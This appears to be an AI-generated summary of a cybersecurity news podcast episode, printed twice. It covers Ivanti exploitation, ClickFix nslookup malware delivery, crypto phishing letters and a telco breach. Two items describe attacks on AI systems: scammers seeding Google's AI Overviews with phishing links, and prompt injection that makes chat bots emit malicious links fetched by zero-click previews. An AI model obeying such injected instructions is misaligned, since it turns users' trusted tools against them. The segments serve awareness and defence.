Daily Cyber Threat Brief Podcast Summary

Podcast: Daily Cyber Threat Brief
Host: Dr. Gerald Auger, "Jerry"
Episode: 🔴 Feb 16’s Top Cyber News NOW! – Ep 1069
Date: February 16, 2026
Theme: The essential cybersecurity stories for professionals, analysts, and leaders — delivered with analysis, practical tips, and community engagement.

Episode Overview

Dr. Gerald Auger ("Jerry"), cybersecurity pro and educator, breaks down the day's top eight cybersecurity news stories, adding context, practical implications, and humor. He highlights attacker tactics, recent breaches, evolving AI-related risks, regulatory news, and tips for practitioners and those new to the field.

Key Discussion Points and Insights

1. Ivanti RCE Attacks: One Actor Dominated Early Exploitation

[11:09–18:39]

Summary: A single IP (on bulletproof infrastructure) is responsible for 83% of attacks exploiting recent Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities.
Key Data: 417 observed attacks; ~320 from one IP; vulnerabilities are being exploited as zero-days.
Expert Analysis:
- Patch quickly if you haven't already; check firewall logs for listed IPs.
- Bulletproof hosting enables criminals to act with impunity — traditional takedowns are difficult.
- As exploitation tools become more refined (especially with AI), expect faster and more concentrated attack waves:
  “If a threat actor is going to get a working valid exploit ... they are going to try to get theirs as quickly as they can.” – Jerry, [13:38]
Action Items:
- Patch Ivanti EPMM immediately
- Hunt for connections to the known threat IP
- Understand "bulletproof hosting" and why attribution is tough

2. Google's AI Overviews Manipulated by Scammers

[18:39–25:05]

Summary: Scammers are figuring out how to plant malicious content into Google's AI-generated search answers (Gemini AI), resulting in phishing sites and scams being suggested to users.
Risks: Users implicitly trust top AI answers, making phishing via this channel highly effective.
Memorable Quote:
“This is huge ... people are giving this implicit trust to the AI and the responses ... because it can’t be evil, it’s coming directly from Google.” – Jerry, [20:17]
Practical Advice:
- Educate users and family: always verify info and links from AI overviews, especially those providing support numbers or download links.
- “Any response from AI? Yes, it’s great. But you have, you can’t trust it fully. You have to have some level of skepticism.” – Jerry, [21:37]

3. DNS-based ‘Click Fix’ Attacks Use NSLookup

[25:05–32:14]

Summary: Attackers using "Click Fix" social engineering convince users to run commands (e.g., via Start→Run), which leverage nslookup to connect to attacker-controlled DNS servers and fetch malware.
New Tactic: Malicious commands use alternative DNS to evade filtering and logs.
Educational Moment:
- Click Fix tricks users with CAPTCHA-like prompts leading to executing PowerShell/DNS commands.
- Core defense: teach users never to run commands suggested by popups or emails.
- “At the end of the day, no matter what, the victim has to hit, start, run and pop open a command run box.” – Jerry, [31:44]

4. Snail Mail Phishing Targets Crypto Users

[32:14–38:53]

Summary: Physical letters sent to Ledger/Trezor hardware wallet users urge them to provide their recovery phrases under false pretenses.
Notable Aspects:
- Highly targeted and personalized, using breached contact data.
- Realistic design; phishing website is convincing.
Insight:
- Even tech-savvy hardware wallet users may fall for this, but usually these users are more skeptical.
- Traditional phishing principles apply: fake urgency, threat of lost access.
- "These criminals really invested in the infrastructure ... This website looks clean, it looks legit. I could see someone falling for this." – Jerry, [34:49]
Advice: Inform users these attacks exist—mail phish can be effective, albeit costly for the attacker.

5. Estonia Urges Europe to Build Offensive Cyber Capability

[46:08–52:31]

Summary: Estonia’s spy chief calls for Europe to invest in homegrown offensive cyber ops, not just defense.
Big Picture:
- Estonia, an early digital adopter, was hit by major cyberattacks in 2007.
- The US and UK are already pursuing 'hack back' and offensive security policies.
Philosophical Question: Should defenders legally attack back? Pros: deterrence; Cons: escalation and collateral damage.
Quote:
“If you slap [someone] and then they come around and slap you back, well, maybe next time you think twice...” – Jerry, [51:15]

6. Ring Cancels Flock Partnership After Privacy Uproar

[52:31–56:31]

Summary: After a controversial Super Bowl ad, Ring (Amazon) cancels plans with Flock Safety (police surveillance tech), amid privacy/facial recognition fears.
Analysis:
- Mass surveillance concerns are finally reaching mainstream awareness.
- “...digital surveillance, techno digital technical surveillance, the Flock cameras, mass deployment... It’s all over the place.” – Jerry, [54:09]
Takeaway: End-users and the public are waking up to surveillance and AI-powered monitoring risks.

7. Dutch Telco Odido Data Breach – 6.2M Customers Exposed

[56:31–57:05]

Summary: Major breach in the Netherlands; customer PII and bank accounts exposed (not passwords/location).
Desensitization:
- Breaches of this scale are now routine: “Just replace the variables ... this story happens every single day.” – Jerry, [57:33]
Actionable Reminder: Tabletop exercises — know your breach notification and crisis response plans.

8. Zero-Click Link Preview Attacks via Messaging Apps & AI

[61:13–62:03]

Summary: Attackers use prompt injections in AI messaging bots (Slack, Telegram) to trick the bot into generating malicious links; link previews fetch the URL autonomously—no user click required.
Expert Deep-Dive:
- AI agents (like OpenClaw/Karn) need careful permission control & identity management.
- Risks: Over-permissioned bots, no restriction on who can command, leading to major compromise.
- “People are going YOLO giving AI all the permissions ... if anyone else can get in there and tell it to do something, it will gladly do it.” – Jerry, [62:25]
Action:
- Implement least privilege for AI agents.
- Control access to bots & verify identities.
- Consider local LLMs for sensitive environments.

Notable Quotes & Moments

On Snail Mail Phishing: “Even the website ... these criminals really invested ... If you’re smart enough to be running a hardware wallet ... you have a healthy level of skepticism ...” [34:49]
AI Security Parable: “It’s not complicated, you have to think through the threats and the risks ... or you’re going to get screwed.” [62:45]
On Conference Talk Anxiety: “The absolute worst thing that could happen ... is that people won’t even remember” [Post-show Q&A]
On AI Agents: “AI is super smart, but it’s also super stupid, right?” [62:50]

Timestamps for Key Segments

[11:09] Ivanti Attacks Analysis
[18:39] Google AI Search Abuse by Scammers
[25:05] DNS Click Fix via NSLookup
[32:14] Ledger/Trezor Crypto Snail Mail Phishing
[46:08] Estonia Offensive Cyber Policy
[52:31] Ring & Flock Privacy Blowback
[56:31] Dutch Telco Data Breach
[61:13] Link Preview, Zero-Click AI Attacks
[Jawjacking/Q&A] Community questions — CISP prep, Google certs, OpenClaw set-up, career advice

Community & Tone

The podcast thrums with an inclusive, conversational spirit, taking cybersecurity seriously but maintaining levity and openness, e.g.:

Music breaks ("let the la-la-las wash over you")
Shout-outs to first-timers; encouragement for learners
Practical “preacher-in-the-classroom” tone on risk, user education, and non-technical user protection

Final Takeaways

Patch fast, check logs, and don’t trust single data points or AI-generated information blindly.
End-user education is more vital than ever (phishing, AI, strange commands, physical mail).
AI security requires careful thought—least privilege, identity control, and monitoring.
The “ordinary” breach is now table stakes—practitioners must prioritize response muscle-memory and communication.
Privacy and surveillance discussions are entering the mainstream—share awareness, not just technical knowledge.
Vibe: Collaborative, positive, and real-world relevant — “It takes a village”; “We’ve got work to do, let’s do it together.”

For the full daily brief and additional resources, head to Simply Cyber’s YouTube or Discord community.

Daily Cyber Threat Brief Podcast Summary

Episode Overview

Key Discussion Points and Insights

1. Ivanti RCE Attacks: One Actor Dominated Early Exploitation

[11:09–18:39]

Summary: A single IP (on bulletproof infrastructure) is responsible for 83% of attacks exploiting recent Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities.
Key Data: 417 observed attacks; ~320 from one IP; vulnerabilities are being exploited as zero-days.
Expert Analysis:
- Patch quickly if you haven't already; check firewall logs for listed IPs.
- Bulletproof hosting enables criminals to act with impunity — traditional takedowns are difficult.
- As exploitation tools become more refined (especially with AI), expect faster and more concentrated attack waves:
  “If a threat actor is going to get a working valid exploit ... they are going to try to get theirs as quickly as they can.” – Jerry, [13:38]
Action Items:
- Patch Ivanti EPMM immediately
- Hunt for connections to the known threat IP
- Understand "bulletproof hosting" and why attribution is tough

2. Google's AI Overviews Manipulated by Scammers

[18:39–25:05]

Summary: Scammers are figuring out how to plant malicious content into Google's AI-generated search answers (Gemini AI), resulting in phishing sites and scams being suggested to users.
Risks: Users implicitly trust top AI answers, making phishing via this channel highly effective.
Memorable Quote:
“This is huge ... people are giving this implicit trust to the AI and the responses ... because it can’t be evil, it’s coming directly from Google.” – Jerry, [20:17]
Practical Advice:
- Educate users and family: always verify info and links from AI overviews, especially those providing support numbers or download links.
- “Any response from AI? Yes, it’s great. But you have, you can’t trust it fully. You have to have some level of skepticism.” – Jerry, [21:37]

3. DNS-based ‘Click Fix’ Attacks Use NSLookup

[25:05–32:14]

Summary: Attackers using "Click Fix" social engineering convince users to run commands (e.g., via Start→Run), which leverage nslookup to connect to attacker-controlled DNS servers and fetch malware.
New Tactic: Malicious commands use alternative DNS to evade filtering and logs.
Educational Moment:
- Click Fix tricks users with CAPTCHA-like prompts leading to executing PowerShell/DNS commands.
- Core defense: teach users never to run commands suggested by popups or emails.
- “At the end of the day, no matter what, the victim has to hit, start, run and pop open a command run box.” – Jerry, [31:44]

4. Snail Mail Phishing Targets Crypto Users

[32:14–38:53]

Summary: Physical letters sent to Ledger/Trezor hardware wallet users urge them to provide their recovery phrases under false pretenses.
Notable Aspects:
- Highly targeted and personalized, using breached contact data.
- Realistic design; phishing website is convincing.
Insight:
- Even tech-savvy hardware wallet users may fall for this, but usually these users are more skeptical.
- Traditional phishing principles apply: fake urgency, threat of lost access.
- "These criminals really invested in the infrastructure ... This website looks clean, it looks legit. I could see someone falling for this." – Jerry, [34:49]
Advice: Inform users these attacks exist—mail phish can be effective, albeit costly for the attacker.

5. Estonia Urges Europe to Build Offensive Cyber Capability

[46:08–52:31]

Summary: Estonia’s spy chief calls for Europe to invest in homegrown offensive cyber ops, not just defense.
Big Picture:
- Estonia, an early digital adopter, was hit by major cyberattacks in 2007.
- The US and UK are already pursuing 'hack back' and offensive security policies.
Philosophical Question: Should defenders legally attack back? Pros: deterrence; Cons: escalation and collateral damage.
Quote:
“If you slap [someone] and then they come around and slap you back, well, maybe next time you think twice...” – Jerry, [51:15]

6. Ring Cancels Flock Partnership After Privacy Uproar

[52:31–56:31]

Summary: After a controversial Super Bowl ad, Ring (Amazon) cancels plans with Flock Safety (police surveillance tech), amid privacy/facial recognition fears.
Analysis:
- Mass surveillance concerns are finally reaching mainstream awareness.
- “...digital surveillance, techno digital technical surveillance, the Flock cameras, mass deployment... It’s all over the place.” – Jerry, [54:09]
Takeaway: End-users and the public are waking up to surveillance and AI-powered monitoring risks.

7. Dutch Telco Odido Data Breach – 6.2M Customers Exposed

[56:31–57:05]

Summary: Major breach in the Netherlands; customer PII and bank accounts exposed (not passwords/location).
Desensitization:
- Breaches of this scale are now routine: “Just replace the variables ... this story happens every single day.” – Jerry, [57:33]
Actionable Reminder: Tabletop exercises — know your breach notification and crisis response plans.

8. Zero-Click Link Preview Attacks via Messaging Apps & AI

[61:13–62:03]

Summary: Attackers use prompt injections in AI messaging bots (Slack, Telegram) to trick the bot into generating malicious links; link previews fetch the URL autonomously—no user click required.
Expert Deep-Dive:
- AI agents (like OpenClaw/Karn) need careful permission control & identity management.
- Risks: Over-permissioned bots, no restriction on who can command, leading to major compromise.
- “People are going YOLO giving AI all the permissions ... if anyone else can get in there and tell it to do something, it will gladly do it.” – Jerry, [62:25]
Action:
- Implement least privilege for AI agents.
- Control access to bots & verify identities.
- Consider local LLMs for sensitive environments.

Notable Quotes & Moments

On Snail Mail Phishing: “Even the website ... these criminals really invested ... If you’re smart enough to be running a hardware wallet ... you have a healthy level of skepticism ...” [34:49]
AI Security Parable: “It’s not complicated, you have to think through the threats and the risks ... or you’re going to get screwed.” [62:45]
On Conference Talk Anxiety: “The absolute worst thing that could happen ... is that people won’t even remember” [Post-show Q&A]
On AI Agents: “AI is super smart, but it’s also super stupid, right?” [62:50]

Timestamps for Key Segments

[11:09] Ivanti Attacks Analysis
[18:39] Google AI Search Abuse by Scammers
[25:05] DNS Click Fix via NSLookup
[32:14] Ledger/Trezor Crypto Snail Mail Phishing
[46:08] Estonia Offensive Cyber Policy
[52:31] Ring & Flock Privacy Blowback
[56:31] Dutch Telco Data Breach
[61:13] Link Preview, Zero-Click AI Attacks
[Jawjacking/Q&A] Community questions — CISP prep, Google certs, OpenClaw set-up, career advice

Community & Tone

The podcast thrums with an inclusive, conversational spirit, taking cybersecurity seriously but maintaining levity and openness, e.g.:

Music breaks ("let the la-la-las wash over you")
Shout-outs to first-timers; encouragement for learners
Practical “preacher-in-the-classroom” tone on risk, user education, and non-technical user protection

Final Takeaways

Patch fast, check logs, and don’t trust single data points or AI-generated information blindly.
End-user education is more vital than ever (phishing, AI, strange commands, physical mail).
AI security requires careful thought—least privilege, identity control, and monitoring.
The “ordinary” breach is now table stakes—practitioners must prioritize response muscle-memory and communication.
Privacy and surveillance discussions are entering the mainstream—share awareness, not just technical knowledge.
Vibe: Collaborative, positive, and real-world relevant — “It takes a village”; “We’ve got work to do, let’s do it together.”

For the full daily brief and additional resources, head to Simply Cyber’s YouTube or Discord community.

wavePod

🔴 Feb 16’s Top Cyber News NOW! - Ep 1069

Powered by Wave AI

Summary

Daily Cyber Threat Brief Podcast Summary

Episode Overview

Key Discussion Points and Insights

1. Ivanti RCE Attacks: One Actor Dominated Early Exploitation

2. Google's AI Overviews Manipulated by Scammers

3. DNS-based ‘Click Fix’ Attacks Use NSLookup

4. Snail Mail Phishing Targets Crypto Users

5. Estonia Urges Europe to Build Offensive Cyber Capability

6. Ring Cancels Flock Partnership After Privacy Uproar

7. Dutch Telco Odido Data Breach – 6.2M Customers Exposed

8. Zero-Click Link Preview Attacks via Messaging Apps & AI

Notable Quotes & Moments

Timestamps for Key Segments

Community & Tone

Final Takeaways

Summary

Daily Cyber Threat Brief Podcast Summary

Episode Overview

Key Discussion Points and Insights

1. Ivanti RCE Attacks: One Actor Dominated Early Exploitation

2. Google's AI Overviews Manipulated by Scammers

3. DNS-based ‘Click Fix’ Attacks Use NSLookup

4. Snail Mail Phishing Targets Crypto Users

5. Estonia Urges Europe to Build Offensive Cyber Capability

6. Ring Cancels Flock Partnership After Privacy Uproar

7. Dutch Telco Odido Data Breach – 6.2M Customers Exposed

8. Zero-Click Link Preview Attacks via Messaging Apps & AI

Notable Quotes & Moments

Timestamps for Key Segments

Community & Tone

Final Takeaways